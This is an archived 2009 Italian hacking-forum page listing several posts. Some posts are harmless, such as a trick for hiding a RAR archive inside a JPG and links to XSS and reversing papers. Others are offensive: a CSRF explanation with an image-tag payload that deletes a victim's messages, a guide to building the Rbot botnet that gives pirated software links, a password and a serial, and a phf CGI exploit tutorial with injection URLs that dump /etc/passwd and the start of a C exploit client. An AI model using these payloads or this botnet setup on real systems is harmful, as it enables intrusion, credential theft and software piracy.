» Italian Hackers [Hacking, Trucchi MSN, Free Download, Videogames, Testi Canzoni, Hentai, Divas]

IH TABLE

Ci siamo trasferiti su un altro forum, clicca il banner sottostanza per arrivarci




Da oggi il forum rimarrà come archivio di discussioni rimaste.
 


5 user(s) online
F_ACTIVE
5 guests
0 members
0 Anonymous Members
[ View Complete List ]


Statistics
F_STATS
» Italian Hackers [Hacking, Trucchi MSN, Free Download, Videogames, Testi Canzoni, Hentai, Divas] have:
330 articles, 3.842 comments, 3.425 members,
616.814 total visits, 2.584 visits this month,
15º in Top Blog

The newest member is esruz

Most users ever online was 1.471 on 14/11/2009, 18:23



Calendar



B_NORM    
view post Posted on 27/6/2009, 14:09 by: Ekich[Quota]
Sicuramente esiste già un tutorial come questo ma nel caso non ci fosse lo posto lo stesso :peo:

CITAZIONE
Nascondere documenti in immagini jpg

Avete dei file importanti sul vostro pc e non volete renderli visibili al primo che passa ?

Avete dei file sulla vostra pen drive e non li volete far leggere/scoprire ?

Bene ecco il metodo che fà per voi :)

Con questa guida vedremo come nascondere un archivio RAR all’interno di una immagine JPG, in modo da far sembrare all’apparenza che il file fosse solo una banalissima immagine,nascondendo l’archivio al suo interno.

Come esempio il file da criptare sarà “hello.txt”, e l’immagine che lo nasconderà sarà “gatto.jpg”.

Cominciamo:

1. Creato un’archivio rar e inseritegli dentro il file hello.txt (l’archivio lo chiameremo fatto.rar)
2. Andate su Start->Esegui e digitate “cmd.exe”
3. spostatevi nella cartella dove risiedono l’archivio e l’immagine (utilizzando il comando cd)
4. digitate questa stringa nel prompt: copy /b “gatto.jpg” + “fatto.rar” “gatto_fatto.jpg”
5. Se tutto andrà per il meglio avrete una nuova immagine nella directory chiamata gatto_fatto.jpg


Se provate ad aprire l’immagine vedrete la normale immagine (quella che avete scelto).

Se invece volete visualizzare l’archivio rar vi basta modificare l’estensione, da jpg a rar (quindi diventerà gatto_fatto.rar).

Adesso vedrete il contenuto dell’archivio.

La funzione copy permette di copiare un file in un altra parte del disco rigido.

con il parametro /b gli viene detto di fare la copia in binario, includendo quindi anche il file rar.

Ovviamente l’immagine che verrà fuori sarà grande quanto la somma dei due file, quindi non usate archivi tanto grossi, perchè ci si potrebbe insospettire vedendo un’immagine di dimenzioni eccessive.

Questo “trucco” è applicabile solo per archivi o simili, non exe (eseguibili)

Io non capisco cosa intede con "comando cd" L'indirizzo della cartella ?? :boh:

Fonte
Comments: 5 | Views: 141
Last Post by: Ekich (27/6/2009, 23:37)
 

B_NORM    
view post Posted on 26/6/2009, 22:24 by: g0t[Quota]
Un utente autenticato (si badi bene: autenticato), data un'iniezione di "codice CSRF" in un programma/sito Web, potrebbe esser portato a fare qualsiasi cosa il cracker voglia, una volta visualizzata la pagina violata, e nemmeno se ne accorgerebbe (salvo non riuscire a visualizzare un'immagine: ben poco)!

Ad esempio potrebbe cancellare tutti i suoi messaggi personali:
CITAZIONE
[IMG] Sito_A?del= y&from_id=1&num=1000[/IMG]

O potrebbe cancellare qualche altro record importante da database, magari non suo - nel caso l'utente avesse particolari diritti/privilegi.

Questi esempi valgono nel caso in cui si sia riusciti ad introdurre codice direttamente nel sito attaccato. Lo stesso sito - lo ripeto - nel quale l'utente vittima sia autenticato ed abbia dati privilegi.

Ma c'è di più: non necessariamente la pagina violata deve far parte del programma/sito attaccato: è sufficiente che l'utente, autenticato sul Sito_A (sito attaccato), visiti una pagina malevola sul Sito_B (sito controllato dal cracker), la quale pagina rindirizzi al Sito_A con query string (o POST vars) ad hoc. La propagazione della sessione sul sito attaccato avviene infatti ugualmente, dacché il browser invia, come sempre, il cookie contenente il SID al server. Nulla al riguardo è variato: è il browser usato che gestisce i cookies.

I CSRF sono quindi vulnerabilità che sfruttano gli utenti autenticati per far loro compiere (inconsapevolmente) una serie di azioni (generalmente nefaste), semplicemente "visualizzando" un'immagine o simile.

L'attacco può essere eseguito anche visualizzando mail in formato HTML: in questa logica sono particolarmente vulnerabili ai CSRF i programmi che utilizzano sistemi di auto log-in (non eseguono il log-out).

Tramite l'uso di URL rewriting, infine, è possibile che la pagina puntata dal tag < img > sembri effettivamente un'immagine remota, pur essendo uno script. Non approfondirò ulteriormente questo tema, il concetto è già chiaro.

Da ultimo, notiamo come il cracker deve conoscere la struttura del Sito_A, in particolare il nome degli script e la lista dei (di alcuni) parametri da passare, al fine di attaccarlo.
Come non difendersi

Una prima idea per la difesa potrebbe essere di richiedere all'utente conferma tramite requester JavaScript. Beh, l'idea non è intelligente (ho usato un eufemismo), in quanto il cracker bypasserà questa richiesta puntando direttamente allo script PHP puntato dal JavaScript di conferma stesso.
Come difendersi

Posto che non sia possibile iniettare codice in Sito_A, dacché sono state seguite scrupolosamente le direttive già esposte, per difendersi da questa tipologia di attacchi è necessario che Sito_A accetti ...

Read the whole post...

Comments: 0 | Views: 51
Last Post by: g0t (26/6/2009, 22:24)
 

B_NORM    
view post Posted on 26/6/2009, 22:13 by: g0t[Quota]
Ecco qui il miglior tutorial( in italiano si intende ) sulla vulnerabilità che prende il nome di xss. Il paper spiega come con l'ascesa del 2.0 dire xss equivale a dire cookie grabbing, spiega come verificare se una pagina è veramente ( dico veramente, cercate XSS su google e poi capirete ) vulnerabile a questa vulnerabilità. Non dico altro, a voi scoprire tutto.
Paper scritto da auron
Link alle guida:

XSS1.pdf: http://blacklight.gotdns.org/hackteaching/pdf/XSS.pdf
XSS2.pdf: http://lezioneauron.altervista.org/XSS2.pdf

Consiglio vivamente a tutti di leggerla, vi farete veramente una cultura "come si deve" sull'xss, se siete pigri con l'inglese.
Comments: 5 | Views: 205
Last Post by: roby46 (30/6/2009, 15:17)
 


B_NORM    
view post Posted on 26/6/2009, 21:35 by: g0t[Quota]
Imparando l'assembly, non si può non imparare il reversing di un eseguibile, così ho deciso di scrivere un tutorial per insegnarlo a tutti coloro che non lo conoscono. Il tutorial è stato rilasciato sotto licenza GPL v3:
http://blacklight.gotdns.org/#gpl

Il file è scaricabile qui: http://rapidshare.com/files/22949148...rsing.pdf.html


P.s: scritto durante un momento di noia, stasera appena sarà un pò + sveglio lo sistemerò per benino
Di BlackLight.
Comments: 0 | Views: 55
Last Post by: g0t (26/6/2009, 21:35)
 

B_NORM    
Comments: 0 | Views: 86
Last Post by: g0t (26/6/2009, 21:30)
 

B_NORM    
view post Posted on 26/6/2009, 21:27 by: g0t[Quota]
[#############################]
[Autore: TheMaster...................]
[Site: http://www.kingpc.it ........]
[E-mail: th3master@hotmail.it .....]
[#############################]

In primo luogo è bisogna scaricare questi tre tool:
________________________________________________________________________
1. Download Mcft Visual C++ 6.0 Standard Edition

http://www.megaupload.com/?d=SUHPYZRX
http://rapidshare.com/files/21861555/msc__.rar.html

Pass: itzforblitz
Serial: 812-2224558

2.Aprite il setup e installatelo. Poi inserite il seriale sopra elencato.

3.Scaricare e installate il Service Pack 6 per Visual Basic 6.0 , Visual C++ 6.0 con Visual Source Safe 6.0d:

http://www.microsoft.com/downloads/details...&displaylang=en

4.Dopo di che scaricate e installate Windows Platform SDK:

http://www.megaupload.com/?d=YH3SS78I
http://rapidshare.com/files/21854411/sdk.rar.html

Pass: itzforblitz
_________________________________________________________________________

Preparazione Microsoft Visual C++ 6.0
_________________________________________________________________________

Ora aprite Microsoft Visual C++ 6.0 , andate in Tools poi opzioni aprite la scheda Directories e sostituite le precedenti righe con queste sotto elencate nello stesso ordine senno non funziona :
CODICE
C:\PROGRAMMI\MICROSOFT PLATFORM SDK
C:\PROGRAMMI\MICROSOFT PLATFORM SDK\BIN
C:\PROGRAMMI\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAMMI\MICROSOFT PLATFORM SDK\LIB

___________________________________________________________________________

Scaricate la versione moddata di Rbot 7.6 a questo link

___________________________________________________________________________


Vai alla directory del file precedentemente scaricato, aprite il file configs.h con il blocco note (o qualsiasi altro programma di editor di testo)

E modificate queste righe:
CODICE
char password[] = ""; // The password that the bot uses when .login command is en...

Read the whole post...

Comments: 4 | Views: 203
Last Post by: hacker51 (27/6/2009, 21:24)
 

B_NORM    
view post Posted on 26/6/2009, 21:25 by: g0t[Quota]
~INTRO.
Quante volte vi è capitato di voler ottenere la password di root in un sistema? Credo molte In questa guida vi mostrerò come utilizzare un programma esistente per "scovare" le password di tutti gli utenti su un pc (Unix).
La guida non è scritta interamente da me, ho imparato queste cosuccie da un altra guida assai "hot" ;-) gli script che posterò sono di Quantumg e loxsmith. Spero che non userete queste informazioni per danneggiare nulla e nessuno. Con questo chiudo l'intro e vi porto nel mondo dell'hacking avanzato (non per beginner... niente più deface e che cazzo!)

~COS' E' IL PHF.
Il phf è un programma molto utile si trova nella cartella cgi-bin, e con esso è possibile leggere tutti i file! (inclusi i file di password MuaahHAhAhhHA -.-) Phf può essere aperto tramite il protocollo httpd o www (quindi da qualsiasi browser web).

~COME USARE (anzi no.) IL PHF.
Se ad esempio avete trovato un server vulnerabile con il phf dentro, oggi ragazzi avete fatto jackpot!
Mettiamo che il server si chiami "chi-mi-defaccia-è-buco.org".
Come prima cosa controlleremo i nostri permessi all'interno del server, con questa stringa:
CODICE
http://chi-mi-defaccia-è-buco.org/cgi-bin/phf/?Qalias=x%0aid

La query risultante vi mostrerà che non siete nessuno (nobody) ergo, non avete permessi di alcun genere, ma come scritto prima, con phf possiamo visualizzare normalmente i file.
Inseriamo questa stringa per visualizzare tutti gli username e le password criptate.
CODICE
http://chi-mi-defaccia-è-buco.org/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd

Lascio a voi il compito di decriprate le password. Consiglio di usare CrackerJack o JohnTheRipper.
Esiste anche un altro modo che non implichi tutte quelle query brutte e cattive cioè l'utilizzo di uno script, eccolo:
CODICE
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
int main(argc, argv)
int argc;
char **argv;
{
int i = 0, s, port, bytes = 128;
char exploit[0xff], buffer[128], hostname[256], *command, j[2];
struct sockaddr_in sin;
struct hostent *he;
if (argc != 3 && argc != 4) {
fprintf(stderr, "Usage: % s command hostname [port]", argv[0]);
exit(1);
}
command ...

Read the whole post...

Comments: 0 | Views: 97
Last Post by: g0t (26/6/2009, 21:25)
 

B_NORM    
Lamerata, problema ( PAG 1 2 )
view post Posted on 26/6/2009, 15:50 by: Irojacs[Quota]
Ok,vi assicuro che ciò che vi chiedo non è per danneggiare nessuno :uno:
Io sono un animatore che usa pivot,un programma che utilizza omini stilizzati per creare animazioni.Si possono crare anche altri omini,edifici,sfondi,che possono essere pubblicati sulla rete.Io sono mebro di un forum di pivot,che ovviamente non posto per spammaare,ma ne esistono migliaia,ma ne esistono solo 3 che sono abbastabnza conosciuti,quello dove sono io e due stranieri.In eìtutti e 4 però si usava quasi sempre questo hosting,che hostava file .stk e .piv ma anche immaggini,si ci poteva registrare e postare animazioni,insoomma,era un hosting ma anche un sito dove ognuno poteva confrontare i propri lavori.

Ma ora c'è un problema:
http://pivothost.org/
Come potete vedere,un lamer ha fatto questo casino.
Milioni è milioni di animazioni probabilmente perse.Io vi chiedo:
Qualcuno di voi è in grado di fare qualcosa?
Comments: 24 | Views: 473
Last Post by: hacker51 (6/7/2009, 10:36)
 

B_NORM    
view post Posted on 26/6/2009, 08:23 by: MangioKebab[Quota]
Mi sapreste dire se il file teamt3.msi è una patch?
Comments: 2 | Views: 267
Last Post by: notrus (26/6/2009, 17:58)
 

Search:

 




Siti Amici : Guida Pokemon Platino; Hack Rom Pokemon; Resource Grafiche;Accessori Moto; Lavori Grafici; Music Story; Testi Canzoni

Il Bloggatore


Skin by Mike³ del MPF e dell' NGG, questa skin è solo per MPF e per IH.